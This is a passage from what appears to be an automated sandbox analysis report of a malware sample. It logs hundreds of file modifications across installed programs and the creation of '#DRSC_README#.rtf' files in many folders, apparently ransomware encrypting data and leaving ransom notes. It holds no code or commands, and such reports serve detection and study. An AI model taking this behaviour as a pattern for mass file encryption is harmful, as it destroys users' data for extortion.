DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\core_icons_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\MEIPreload\manifest.json 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\jfr.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\rhp\createpdfupsell-app-tool-view.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\dd_arrow_small2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\org-openide-util-lookup.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.attach_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\precomplete 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_download_pdf_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pl-pl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\UnprotectNew.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\arrow-left.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sl-si\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\clearkey.dll.sig 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\youtube.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Updater.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\illustrations.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\illustrations.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\sample-thumb.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ko-kr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\pl.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\bl.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\epl-v10.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.core.contexts_1.3.100.v20140407-1019.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.text.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DigSig.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\sendforcomments.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ru-ru\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\win32_MoveNoDrop32x32.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-coredump_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\modules\host.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.util_1.0.500.v20130404-1337.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\locale\org-openide-filesystems_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sl-si\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ja.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\jce.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\css\main-selector.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner-2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\jfxrt.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\require\2.1.15\require.min.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\calendars.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\icons_ie8.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_signed_out.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\Info.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\themes\dark\rhp_world_icon.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_xml.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prc\MyriadCAD.otf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ca-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-io.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-javahelp_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviews_super.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_fillandsign_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\check_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-Regular.otf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\form_responses.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\check.cur 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-uihandler.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-mac.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-ma\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\javaws.policy 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\tr-tr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.ds_1.4.200.v20131126-2331.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_replace_signer_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\new_icons_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\example_icons2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\SearchEmail.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkServerCP.bat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\browse_window.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Comments.aapp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filter-down_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\pl-pl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\title.htm 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ui-strings.js 